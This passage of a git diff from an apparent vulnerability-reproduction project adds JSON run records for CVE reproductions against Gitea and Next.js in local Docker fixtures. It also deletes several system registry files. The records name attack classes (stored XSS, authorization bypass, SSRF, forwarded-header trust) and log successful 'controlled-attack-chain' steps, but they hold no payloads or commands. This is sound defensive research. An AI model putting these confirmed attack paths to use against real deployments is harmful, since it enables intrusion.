+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "stored payload rendered inside the browser proof page"
+      },
+      {
+        "name": "browser-present",
+        "kind": "browser-present",
+        "passed": true,
+        "detail": "browser evidence captured"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:28:13+00:00",
+  "finished_at": "2026-03-18T01:28:19+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd"
+  }
+}
diff --git a/08-threat-intel/registry/runs/gitea-gitea--CVE-2025-68940-20260318012708.json b/08-threat-intel/registry/runs/gitea-gitea--CVE-2025-68940-20260318012708.json
new file mode 100644
index 00000000..1662de0a
--- /dev/null
+++ b/08-threat-intel/registry/runs/gitea-gitea--CVE-2025-68940-20260318012708.json
@@ -0,0 +1,145 @@
+{
+  "run_id": "gitea-gitea--CVE-2025-68940-20260318012708",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2025-68940",
+  "repro_profile_id": "gitea-authz-bypass",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.authz-bypass",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json"
+    }
+  ],
+  "browser_refs": [],
+  "browser_evidence": {
+    "required": false,
+    "present": false,
+    "refs": [],
+    "baseline_refs": [],
+    "proof_refs": [],
+    "baseline_title": null,
+    "proof_title": null,
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:27:08+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2025-68940"
+    },
+    {
+      "at": "2026-03-18T01:27:08+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-authz-bypass"
+    },
+    {
+      "at": "2026-03-18T01:27:08+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:27:12+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:27:12+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2025-68940-20260318012708"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "server-side authorization recheck was bypassed"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:27:08+00:00",
+  "finished_at": "2026-03-18T01:27:12+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd"
+  }
+}
diff --git a/08-threat-intel/registry/runs/nextjs-nextjs--CVE-2020-15242-20260318012830.json b/08-threat-intel/registry/runs/nextjs-nextjs--CVE-2020-15242-20260318012830.json
new file mode 100644
index 00000000..1772d035
--- /dev/null
+++ b/08-threat-intel/registry/runs/nextjs-nextjs--CVE-2020-15242-20260318012830.json
@@ -0,0 +1,197 @@
+{
+  "run_id": "nextjs-nextjs--CVE-2020-15242-20260318012830",
+  "system_id": "nextjs",
+  "advisory_id": "nextjs--CVE-2020-15242",
+  "repro_profile_id": "nextjs-proxy-boundary",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json"
+    }
+  ],
+  "browser_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
+  ],
+  "browser_evidence": {
+    "required": true,
+    "present": true,
+    "refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json"
+    ],
+    "proof_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
+    ],
+    "baseline_title": "Next.js Proxy Boundary Fixture",
+    "proof_title": "Next.js Proxy Boundary Fixture - proof",
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:28:30+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "nextjs--CVE-2020-15242"
+    },
+    {
+      "at": "2026-03-18T01:28:30+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "nextjs-proxy-boundary"
+    },
+    {
+      "at": "2026-03-18T01:28:31+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "browser-replay-before-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:35+00:00",
+      "step": "browser-replay-after-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:35+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:28:37+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:28:37+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "nextjs-nextjs--CVE-2020-15242-20260318012830"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "trusted forwarded headers crossed the boundary"
+      },
+      {
+        "name": "browser-present",
+        "kind": "browser-present",
+        "passed": true,
+        "detail": "browser evidence captured"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:28:30+00:00",
+  "finished_at": "2026-03-18T01:28:37+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd"
+  }
+}
diff --git a/08-threat-intel/registry/runs/nextjs-nextjs--CVE-2024-34351-20260318012953.json b/08-threat-intel/registry/runs/nextjs-nextjs--CVE-2024-34351-20260318012953.json
new file mode 100644
index 00000000..aa0cf021
--- /dev/null
+++ b/08-threat-intel/registry/runs/nextjs-nextjs--CVE-2024-34351-20260318012953.json
@@ -0,0 +1,145 @@
+{
+  "run_id": "nextjs-nextjs--CVE-2024-34351-20260318012953",
+  "system_id": "nextjs",
+  "advisory_id": "nextjs--CVE-2024-34351",
+  "repro_profile_id": "nextjs-ssrf",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.ssrf",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json"
+    }
+  ],
+  "browser_refs": [],
+  "browser_evidence": {
+    "required": false,
+    "present": false,
+    "refs": [],
+    "baseline_refs": [],
+    "proof_refs": [],
+    "baseline_title": null,
+    "proof_title": null,
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:29:53+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "nextjs--CVE-2024-34351"
+    },
+    {
+      "at": "2026-03-18T01:29:53+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "nextjs-ssrf"
+    },
+    {
+      "at": "2026-03-18T01:29:53+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:29:57+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:29:57+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "nextjs-nextjs--CVE-2024-34351-20260318012953"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "server-side callback reached the local sink"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:29:53+00:00",
+  "finished_at": "2026-03-18T01:29:57+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/timeline.mmd"
+  }
+}
diff --git a/08-threat-intel/registry/runs/nextjs-nextjs--CVE-2024-51479-20260318012913.json b/08-threat-intel/registry/runs/nextjs-nextjs--CVE-2024-51479-20260318012913.json
new file mode 100644
index 00000000..13ad88f9
--- /dev/null
+++ b/08-threat-intel/registry/runs/nextjs-nextjs--CVE-2024-51479-20260318012913.json
@@ -0,0 +1,145 @@
+{
+  "run_id": "nextjs-nextjs--CVE-2024-51479-20260318012913",
+  "system_id": "nextjs",
+  "advisory_id": "nextjs--CVE-2024-51479",
+  "repro_profile_id": "nextjs-authz-bypass",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.authz-bypass",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json"
+    }
+  ],
+  "browser_refs": [],
+  "browser_evidence": {
+    "required": false,
+    "present": false,
+    "refs": [],
+    "baseline_refs": [],
+    "proof_refs": [],
+    "baseline_title": null,
+    "proof_title": null,
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:29:13+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "nextjs--CVE-2024-51479"
+    },
+    {
+      "at": "2026-03-18T01:29:13+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "nextjs-authz-bypass"
+    },
+    {
+      "at": "2026-03-18T01:29:13+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:29:17+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:29:17+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "nextjs-nextjs--CVE-2024-51479-20260318012913"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "server-side authorization recheck was bypassed"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:29:13+00:00",
+  "finished_at": "2026-03-18T01:29:17+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd"
+  }
+}
diff --git a/08-threat-intel/registry/systems/adminer.json b/08-threat-intel/registry/systems/adminer.json
deleted file mode 100644
index 58196fa5..00000000
--- a/08-threat-intel/registry/systems/adminer.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "adminer",
-  "display_name": "Adminer",
-  "category": "platforms",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/platforms/adminer",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "authz-server-side-recheck"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/adobe-commerce.json b/08-threat-intel/registry/systems/adobe-commerce.json
deleted file mode 100644
index 7a60e8a4..00000000
--- a/08-threat-intel/registry/systems/adobe-commerce.json
+++ /dev/null
@@ -1,22 +0,0 @@
-{
-  "system_id": "adobe-commerce",
-  "display_name": "Adobe Commerce",
-  "category": "ecommerce",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/ecommerce/adobe-commerce",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "file-upload-validation",
-    "xss-output-encoding",
-    "plugin-extension-trust-policy"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/angular.json b/08-threat-intel/registry/systems/angular.json
deleted file mode 100644
index 3fcc11e5..00000000
--- a/08-threat-intel/registry/systems/angular.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "angular",
-  "display_name": "Angular",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/angular",
-  "secure_code_topics": [
-    "xss-output-encoding",
-    "template-injection-guard",
-    "csp-trusted-types"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/apache-httpd.json b/08-threat-intel/registry/systems/apache-httpd.json
deleted file mode 100644
index be913fb2..00000000
--- a/08-threat-intel/registry/systems/apache-httpd.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "apache-httpd",
-  "display_name": "Apache HTTP Server",
-  "category": "servers",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/servers/apache-httpd",
-  "secure_code_topics": [
-    "request-smuggling-boundary",
-    "proxy-trust-boundary",
-    "path-traversal-guard"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/apache-tomcat.json b/08-threat-intel/registry/systems/apache-tomcat.json
deleted file mode 100644
index 0fd8e6a4..00000000
--- a/08-threat-intel/registry/systems/apache-tomcat.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "apache-tomcat",
-  "display_name": "Apache Tomcat",
-  "category": "servers",
-  "tier": "history-full",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/servers/apache-tomcat",
-  "secure_code_topics": [
-    "request-smuggling-boundary",
-    "authz-server-side-recheck",
-    "path-traversal-guard"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/aspnet-core.json b/08-threat-intel/registry/systems/aspnet-core.json
deleted file mode 100644
index feb9372f..00000000
--- a/08-threat-intel/registry/systems/aspnet-core.json
+++ /dev/null
@@ -1,21 +0,0 @@
-{
-  "system_id": "aspnet-core",
-  "display_name": "ASP.NET Core",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/aspnet-core",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "xss-output-encoding",
-    "file-upload-validation"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/astro.json b/08-threat-intel/registry/systems/astro.json
deleted file mode 100644
index 2e4c3809..00000000
--- a/08-threat-intel/registry/systems/astro.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
-  "system_id": "astro",
-  "display_name": "Astro",
-  "category": "frameworks",
-  "tier": "rolling-24m",
-  "total": 0,
-  "markdown_cases": 0,
-  "triage_count": 0,
-  "latest_update": "",
-  "output_dir": "07-framework-security/frameworks/astro",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "csp-trusted-types"
-  ],
-  "verified_real": 0,
-  "verified_synthetic": 0,
-  "blocked_count": 0,
-  "manual_count": 0,
-  "items": []
-}
diff --git a/08-threat-intel/registry/systems/caddy.json b/08-threat-intel/registry/systems/caddy.json
deleted file mode 100644
index fbb572c2..00000000
--- a/08-threat-intel/registry/systems/caddy.json
+++ /dev/null
@@ -1,20 +0,0 @@
-{
